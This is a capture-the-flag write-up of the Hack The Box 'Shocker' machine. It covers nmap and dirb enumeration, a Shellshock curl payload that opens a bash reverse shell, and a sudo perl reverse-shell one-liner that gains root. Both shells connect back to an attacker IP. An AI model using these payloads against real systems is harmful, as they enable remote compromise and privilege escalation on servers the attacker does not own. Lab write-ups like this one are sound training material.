Hack The Box - Shocker Writeup
Description:
This is an easy linux box that is vulnerable to shellshock. Doing this as part of my OSCP preparation.
Enumeration
Add shocker to hosts and start an nmap scan.
Nmap
kali@kali:~$ sudo nmap -sS -A shocker.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-12 23:09 EDT
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.23s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Dirb
kali@kali:~/Desktop/tools/autorecon/results/shocker.htb/scans$ dirb http://shocker.htb
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Aug 13 09:43:37 2020
URL_BASE: http://shocker.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://shocker.htb/ ----
+ http://shocker.htb/cgi-bin/ (CODE:403|SIZE:294)
Initial scan reveals a cgi-bin directory with 403 response.
At this point I had done literally everything possible for an initial foothold, but I could not find anything useful. After some clues from the name of the box and forums, I came to the conclusion that the box is vulnerable to shellshock.
Let’s run dirb to see if there is any file in cgi-bin directory as this is the possible entry point for shellshock
kali@kali:~/Desktop/htb/shocker$ dirb http://shocker.htb/cgi-bin/ -X .sh
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Aug 13 11:14:02 2020
URL_BASE: http://shocker.htb/cgi-bin/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.sh) | (.sh) [NUM = 1]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://shocker.htb/cgi-bin/ ----
+ http://shocker.htb/cgi-bin/user.sh (CODE:200|SIZE:118)
-----------------
END_TIME: Thu Aug 13 11:32:47 2020
DOWNLOADED: 4612 - FOUND: 1
Alright, we have a hit.
Looking at the contents of the file
Content-Type: text/plain
Just an uptime test script
10:26:56 up 11:16, 0 users, load average: 0.01, 0.01, 0.00
Nothing special. Lets start trying out payloads to trigger shellshock.
User Shell
We can execute the following payload to get a reverse shell.
curl -H "User-Agent: () { :; }; /bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.4/1337 0>&1'" shocker.htb/cgi-bin/user.sh
Start a listener to receive the shell.
kali@kali:~/Desktop/tools/autorecon/results/shocker.htb/scans$ nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.14.4] from shocker.htb [10.10.10.56] 52198
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ id
id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
Root Shell
The user has permission to run perl as sudo.
shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
We can execute a perl reverse shell to get root.
shelly@Shocker:/home/shelly$ sudo /usr/bin/perl -e 'use Socket;$i="10.10.14.4";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Start a listener to receive the shell.
kali@kali:~/Desktop/tools$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.4] from shocker.htb [10.10.10.56] 40916
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
And we are root!
